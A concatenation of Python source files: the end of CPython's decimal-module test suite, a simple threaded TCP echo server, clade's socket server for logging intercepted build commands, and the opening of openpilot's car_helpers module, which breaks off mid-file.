self.assertRaises(TypeError, setattr, c, 'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises((OverflowError, ValueError), Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises((OverflowError, ValueError), setattr, c, attr,
int_max+1)
self.assertRaises((OverflowError, ValueError), setattr, c, attr,
-int_max-2)
if sys.platform != 'win32':
self.assertRaises((OverflowError, ValueError), setattr, c, attr, int_max)
self.assertRaises((OverflowError, ValueError), setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises((ValueError, OverflowError), setattr, c, attr, 2**32)
self.assertRaises((ValueError, OverflowError), setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
# pypy does not keep interned strings
@cpython_only
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
@cpython_only
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
def test_main(arith=False, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith or is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
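# For example, a data file named "abs.decTest" would generate the methods
# CIBMTestCases.test_abs and PyIBMTestCases.test_abs at this point.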
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if orig_sys_decimal is not sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
tcp_server_3.py
|
import socket
import threading
# Handle requests from a connected client
def handle_client_request(service_client_socket, ip_port):
# Keep receiving data sent by the client
while True:
# Receive data sent by the client
recv_data = service_client_socket.recv(1024)
# A container can be tested directly in an if statement: a non-empty container is truthy, an empty one is falsy
# Container types: list, dict, tuple, str, set, range, bytes
if recv_data:
print(recv_data.decode("gbk"), ip_port)
# Send a reply
service_client_socket.send("ok, your request is being handled...".encode("gbk"))
else:
print("客户端下线了:", ip_port)
break
# Stop communicating with this client
service_client_socket.close()
if __name__ == '__main__':
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# Bind the port number
tcp_server_socket.bind(("", 9000))
# Start listening; after listen() this socket is passive and only accepts incoming connection requests
tcp_server_socket.listen(128)
# Loop, waiting for client connection requests
while True:
# Wait for a client connection request
service_client_socket, ip_port = tcp_server_socket.accept()
print("客户端连接成功:", ip_port)
# Once a client connection is established, create a child thread; each child thread receives messages from one client
sub_thread = threading.Thread(target=handle_client_request, args=(service_client_socket, ip_port))
# Make the child thread a daemon so it exits together with the main thread
sub_thread.daemon = True
# Start the child thread
sub_thread.start()
# The TCP server socket does not need to be closed, because the server program keeps running
# tcp_server_socket.close()
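# Illustrative companion sketch (added for this write-up, not part of the
# original script): a minimal client for the server above. It assumes the
# server is reachable on the same machine at port 9000 and that both sides use
# the "gbk" encoding, matching the server code. Shown commented out because it
# belongs in a separate client script, not in this server file:
#
#   import socket
#
#   client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client_socket.connect(("127.0.0.1", 9000))
#   client_socket.send("hello, server".encode("gbk"))
#   reply = client_socket.recv(1024)
#   print(reply.decode("gbk"))
#   client_socket.close()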
|
server.py
|
# Copyright (c) 2018 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import threading
import os
import socketserver
import sys
import tempfile
from clade.utils import get_logger
from clade.extensions.abstract import Extension
from clade.cmds import split_cmd, join_cmd
if sys.platform == "linux" or sys.platform == "darwin":
parent = socketserver.UnixStreamServer
else:
parent = socketserver.TCPServer
# Forking and threading versions can be created using
# the ForkingMixIn and ThreadingMixIn mix-in classes.
# For instance, a forking CladeSocketServer class is created as follows:
# class SocketServer(ForkingMixIn, parent):
class SocketServer(parent):
class RequestHandler(socketserver.StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip().decode("utf-8")
cmd = split_cmd(data)
for ext in self.extensions:
ext.preprocess(cmd)
data = join_cmd(cmd)
with open(self.output, "a") as clade_fh:
clade_fh.write(data + "\n")
def __init__(self, address, output, conf):
self.process = None
# Stores the file object for the temporary directory that holds the UNIX socket
self.socket_fh = None
rh = SocketServer.RequestHandler
rh.output = output
# Request handler must have access to extensions
extensions = []
for cls in Extension.get_all_extensions():
extensions.append(cls(conf.get("work_dir", "Clade"), conf))
rh.extensions = extensions
super().__init__(address, rh)
def start(self):
if sys.platform == "win32" or (sys.platform == "darwin" and sys.version_info[1] >= 8):
self.process = threading.Thread(target=self.serve_forever)
else:
self.process = multiprocessing.Process(target=self.serve_forever)
self.process.daemon = True
self.process.start()
def terminate(self):
# If a UNIX socket was used, its parent directory needs to be closed
if self.socket_fh:
self.socket_fh.close()
class PreprocessServer:
def __init__(self, conf, output):
self.conf = conf
self.output = output
self.logger = get_logger("Server", conf=self.conf)
self.server = self.__prepare()
self.env = self.__setup_env()
def __prepare(self):
if sys.platform == "linux" or sys.platform == "darwin":
self.logger.debug("UNIX socket will be used")
server = self.__prepare_unix()
else:
self.logger.debug("INET socket will be used")
server = self.__prepare_inet()
return server
def __prepare_unix(self):
# Create temporary directory with random name to store UNIX socket
f = tempfile.TemporaryDirectory()
name = os.path.join(f.name, "clade.sock")
self.conf["Server.address"] = name
server = SocketServer(name, self.output, self.conf)
# Keep a reference to the TemporaryDirectory object; without it, the object would be cleaned up (and the socket directory removed) as soon as this function returns
server.socket_fh = f
return server
def __prepare_inet(self):
self.conf["Server.host"] = self.conf.get("Server.host", "localhost")
self.conf["Server.port"] = self.conf.get("Server.port", "0")
server = SocketServer(
(self.conf["Server.host"], int(self.conf["Server.port"])),
self.output,
self.conf,
)
# If "Server.port" is 0, than dynamic port assignment is used and the value needs to be updated
self.conf["Server.port"] = str(server.server_address[1])
return server
def __setup_env(self):
env = os.environ.copy()
# Windows doesn't support UNIX sockets
if sys.platform == "linux" or sys.platform == "darwin":
env.update({"CLADE_UNIX_ADDRESS": self.conf["Server.address"]})
else:
env.update({"CLADE_INET_HOST": self.conf["Server.host"]})
env.update({"CLADE_INET_PORT": self.conf["Server.port"]})
env.update({"CLADE_PREPROCESS": "true"})
return env
def start(self):
# Create separate server process
self.server.start()
def terminate(self):
self.server.terminate()
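# Minimal usage sketch (added for illustration; not part of the original file).
# It assumes that instantiating the registered extensions with an empty
# configuration dict is acceptable; real clade runs pass a full configuration.
if __name__ == "__main__":
    server = PreprocessServer(conf={}, output="cmds.txt")
    server.start()
    # The environment below is what intercepted build processes would inherit
    # so they can reach the server (CLADE_UNIX_ADDRESS or CLADE_INET_HOST/PORT).
    print(server.env)
    server.terminate()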
|
car_helpers.py
|
import os
import threading
import requests
from common.params import Params, put_nonblocking
from common.basedir import BASEDIR
from selfdrive.version import comma_remote, tested_branch
from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_known_cars
from selfdrive.car.vin import get_vin, VIN_UNKNOWN
from selfdrive.car.fw_versions import get_fw_versions, match_fw_to_car
from selfdrive.swaglog import cloudlog
import cereal.messaging as messaging
from selfdrive.car import gen_empty_fingerprint
from cereal import car
from common.travis_checker import travis
if not travis:
import selfdrive.crash as crash
EventName = car.CarEvent.EventName
def get_startup_event(car_recognized, controller_available):
if comma_remote and tested_branch:
event = EventName.startup
else:
event = EventName.startupMaster
if not car_recognized:
event = EventName.startupNoCar
elif car_recognized and not controller_available:
event = EventName.startupNoControl
return event
def get_one_can(logcan):
while True:
can = messaging.recv_one_retry(logcan)
if len(can.can) > 0:
return can
def load_interfaces(brand_names):
ret = {}
for brand_name in brand_names:
path = ('selfdrive.car.%s' % brand_name)
CarInterface = __import__(path + '.interface', fromlist=['CarInterface']).CarInterface
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carstate.py'):
CarState = __import__(path + '.carstate', fromlist=['CarState']).CarState
else:
CarState = None
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carcontroller.py'):
CarController = __import__(path + '.carcontroller', fromlist=['CarController']).CarController
else:
CarController = None
for model_name in brand_names[brand_name]:
ret[model_name] = (CarInterface, CarController, CarState)
return ret
def _get_interface_names():
# read all the folders in selfdrive/car and return a dict where:
# - keys are all the car brand names for which we have an interface
# - values are lists of specific car models for a given brand
brand_names = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
try:
brand_name = car_folder.split('/')[-1]
model_names = __import__('selfdrive.car.%s.values' % brand_name, fromlist=['CAR']).CAR
model_names = [getattr(model_names, c) for c in model_names.__dict__.keys() if not c.startswith("__")]
brand_names[brand_name] = model_names
except (ImportError, IOError):
pass
return brand_names
# imports from directory selfdrive/car/<name>/
